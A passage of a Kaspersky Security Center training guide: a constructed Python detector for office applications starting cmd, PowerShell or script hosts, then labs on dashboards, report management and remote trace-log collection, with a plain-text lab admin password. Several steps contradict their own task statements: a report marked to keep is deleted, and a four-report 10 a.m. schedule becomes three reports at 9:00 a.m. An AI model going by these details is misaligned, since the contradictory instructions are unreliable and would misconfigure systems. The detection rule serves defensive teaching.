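The Adaptive Anomaly Control rules switched between Smart and Block in this lab all describe one parent/child relationship: an office application starting a script host. The added Python example below, written for this guide and not Kaspersky's code, applies that same logic to constructed Sysmon-style process-creation records, so the behaviour of the four script-host rules can be seen outside the product. It assumes Smart means log-only and Block means the start is blocked, it does not model the "Start of embedded file" rule, and the event lines, user names and paths are constructed for the example.

```python
"""Detection logic for the "Activity of office applications" rules of Lab 19.

Constructed example for this guide, not Kaspersky's code: it reads
Sysmon-style process-creation records (constructed below) and reports a
hit when an office application starts one of the script hosts named in
the lab's rules. "Smart" is modelled as log-only and "Block" as a blocked
start; the "Start of embedded file" rule is not modelled.
"""
import re
from typing import Dict, List, Optional

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe"}

# Child process -> rule name exactly as listed in the lab (Task A, step 10).
RULES: Dict[str, str] = {
    "cscript.exe": "Start of Microsoft Console Based Script Host from office application",
    "wscript.exe": "Start of Microsoft Windows Based Script Host from office application",
    "cmd.exe": "Start of Microsoft Windows Command Processor from office application",
    "powershell.exe": "Start of Microsoft PowerShell from office application",
}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse `Key=value` and `Key="quoted value"` pairs from one record."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str], actions: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a hit when an office app starts a script host, else None.

    `actions` maps a rule name to "Smart" or "Block"; rules absent from it
    keep the product default used in the lab, Smart.
    """
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent not in OFFICE_APPS or child not in RULES:
        return None
    rule = RULES[child]
    verdict = "blocked" if actions.get(rule, "Smart") == "Block" else "logged"
    return {"rule": rule, "verdict": verdict, "user": event.get("User", "?"),
            "parent": parent, "child": child}


# Constructed process-creation records; the paths follow the usual Windows layout.
SAMPLE_LOG = [
    r'EventID=1 User="ABC\Tom" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"',
    r'EventID=1 User="ABC\Tom" Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\explorer.exe"',
    r'EventID=1 User="ABC\Alex" Image="C:\Windows\System32\wscript.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"',
    r'EventID=1 User="ABC\Tom" Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"',
]

# Lab 19, Task A: the office rules switched from Smart to Block.
LAB_BLOCK_MODE = {rule: "Block" for rule in RULES.values()}


def scan(actions: Dict[str, str], lines: List[str] = SAMPLE_LOG) -> List[Dict[str, str]]:
    """Classify every record and keep the hits, in log order."""
    hits = []
    for line in lines:
        hit = classify(parse_event(line), actions)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for mode_name, actions in [("Smart (default)", {}), ("Block (Task A)", LAB_BLOCK_MODE)]:
        print(mode_name)
        for hit in scan(actions):
            print(f"  {hit['verdict']}: {hit['parent']} -> {hit['child']} "
                  f"({hit['user']}) [{hit['rule']}]")
```

Of the four constructed records, only the two where an office application is the parent of a script host produce a hit; cmd.exe started from Explorer and notepad.exe started from Excel are left alone, which is the same distinction the product's rules draw.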

Lab 20.
How to configure the dashboard
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. In your daily routine, you open the KSC management console to monitor the status of applications. To have a quick
protection status overview, configure the dashboard to summarize the health of your systems.

Contents. In this lab, you will configure the dashboard for daily monitoring.

Task A: Add new widgets to the dashboard


The task is performed on Security-Center.
The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

1. Open the Kaspersky Security Center Web Console
2. Switch to the Monitoring & Reporting | Dashboard tab
3. Note that Kaspersky Security Center Web Console has a few preset widgets
4. To create a new widget, click Add or restore widget
5. Expand Update and select Distribution of anti-virus databases
6. Click Add

7. A new widget has been added to the page
8. Click Add or restore widget
9. Expand Statistics of threats and select History of network attacks
10. Click Add
11. To edit the widget’s representation, click its gear icon
12. Select Chart type: Lines

13. The widget’s representation has changed

Task B: Delete and rearrange widgets

Delete unnecessary widgets and rearrange the others on the dashboard.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

14. In the New devices widget, click the gear icon and select Hide widget

15. Click OK to confirm
16. Note that the widgets have moved to close the gap
17. On the Most frequent threats widget, click the gear icon and select Move
18. Click the Threat activity widget that currently takes the place onto which you want to move the Most frequent threats widget
19. The widgets have been relocated

Conclusion

You have added the widgets that you need to the dashboard, which shows the most important information about network
protection.

Lab 21.
How to configure maintenance tools
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. To be able to find the necessary information and react to threats quicker, delete the reports that you do not use, prepare
a virus scan task that can be started from computers’ shortcut menus, and configure weekly reports to be emailed to you.

Contents. In this lab, we will:

1. Delete unnecessary reports
2. Create a report about computers infected over the previous week
3. Configure the most important reports to be emailed

Task A: Delete unnecessary reports

Delete all reports except for:

– Kaspersky Lab software version report
– Threats report
– Report on blocked runs
– Most infected computers report
– Report on users of infected devices
– Web control report
– Protection deployment report
– Network attack report
– Protection status report
– Report on file operations on removable drives
– Key usage report
– Anti-virus database usage report

The task is performed on Security-Center.

The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

1. Open Kaspersky Security Center Web Console
2. Switch to the Monitoring & Reporting | Reports tab
3. Select the Errors report
4. Click Delete
5. Confirm that you want to delete the report: Click OK

6. Delete the following reports in a similar manner:
— Hardware report
— Report on incompatible applications
— Report on file encryption errors
— Report on blockage of access to encrypted files
— Report on device users
— Report on effective user permissions
— Report on encryption status of mass storage devices
— Report on hardware registry
— Kaspersky Lab software version report
— Report on key usage by virtual Administration Server
— Report on rights
— Report on rights about access to encrypted devices
— Report on test blocked runs
— Software updates report
— Vulnerabilities report
— Report on attacked controllers
— Report on check of programmable logic controllers (PLCs) for integrity
— Report on results of update installation of third-party software

Task B: Create a weekly report about infected computers

Rename the Report on most heavily infected devices to Monthly report on most heavily infected devices.

Create another report about infected computers, but schedule the report to be generated on a weekly basis.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

7. Open the properties of the Report on most heavily infected devices
8. Rename the report to Monthly report on most heavily infected devices and click Save
9. Close the report window
10. Create a new report: Click the Add button
11. Name the report Weekly report on most heavily infected devices
12. Expand Statistics of threats and select Report on most heavily infected devices
13. Click Next
14. Select Administration group and then Managed devices
15. Click Next

16. Set the reporting period to 7 days and click OK
17. In the window that opens, click Save

Task C: Configure the most important reports to be emailed

Configure the following reports to be emailed weekly on Mondays at 10 a.m.:

— Protection status report
— Anti-virus database usage report
— Weekly report on most heavily infected devices
— Network attack report

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

18. Open Kaspersky Security Center Web Console
19. Open the Devices | Tasks tab
20. Create a report sending task: Click Add
21. Select Kaspersky Security Center 11 on the list of applications
22. For the task type, specify Deliver reports
23. Name the task Deliver reports
24. Click Next

25. Select the following reports:
— Weekly report on most heavily infected devices
— Anti-virus database usage report
— Network attack report
26. Specify the delivery method: Send reports by email
27. Click Settings
28. In the Email address field, type [email protected]
29. Click OK

30. Click Next
31. Click Next
32. Clear the checkbox Open task details when creation is complete
33. Click Finish
34. Click the Deliver reports link
35. Switch to the Schedule tab
36. Set the emailing interval to Weekly
37. Select Monday and 9:00 a.m., and click Save

Conclusion

You have deleted unused reports, and now you will be able to find the necessary ones quicker.

Lab 22.
How to collect diagnostic information
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Kaspersky Endpoint Security components will not start on a corporate computer, and you have not been able to find
out the reasons for the incident. Collect trace logs of Kaspersky Endpoint Security to be sent to technical support. Do it
remotely from the Administration Console.

Contents. In this lab, you will remotely collect trace logs from a computer.

Task A: Collect trace logs from a computer

Find the Alex-Desktop computer in the console and start the remote diagnostics utility from its shortcut menu. In the utility
window, enable tracing for Kaspersky Endpoint Security, restart Kaspersky Endpoint Security, and download the logs.
Additionally, download information about the computer and Windows logs: Kaspersky Event Log and System.

The task is performed on Security-Center.


The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Log on to the abc\Administrator account, password Ka5per5Ky
2. Start the Administration Console
3. Go to the Managed devices node
4. To find the Alex-Desktop computer, run the search utility from the shortcut menu of the Managed devices node
5. Type Alex-Desktop and click Find now

6. Make sure that the Alex-Desktop computer has appeared in the search results
7. Run the remote diagnostics utility: On the computer’s shortcut menu, select Custom tools | Remote diagnostics
8. Make sure that the Device box contains the name of the Alex-Desktop computer
9. Connect the utility to the computer: Click Sign in
10. Enable tracing: Select Kaspersky Endpoint Security for Windows
11. Click the link Modify tracing level
12. Leave the tracing level at 500
13. Select the checkbox Rotation-based tracing
14. Set the Files count to 2
15. Specify the Maximum file size: 20 MB
16. Click OK

17. Restart Kaspersky Endpoint Security: Click the link Restart application
18. Wait for Kaspersky Endpoint Security to restart: At the bottom of the window, the message Operation completed successfully will appear
19. Disable tracing: Click the link Disable tracing
20. Expand the Kaspersky Endpoint Security for Windows | Trace files folder
21. Select the first file on the list and click the link Download file
22. Download the other files from the Trace files folder in a similar manner
23. Download information about the computer: Select the System Info node
24. Click the link Download System Info
25. Expand the Event log node and save the Kaspersky Event Log and System log in a similar manner
26. Click the link Download folder in the lower-left corner of the window

27. Make sure that the folder contains all the necessary logs
28. Close the diagnostics utility
29. Do not delete the folder with logs: Click No

Conclusion

We have downloaded Kaspersky Endpoint Security trace logs and system information from the computer. Attach these logs to
the request to technical support.

You can also use the diagnostics utility if you need Network Agent logs, update module logs, installation logs, or tracing for
the Administration Server.
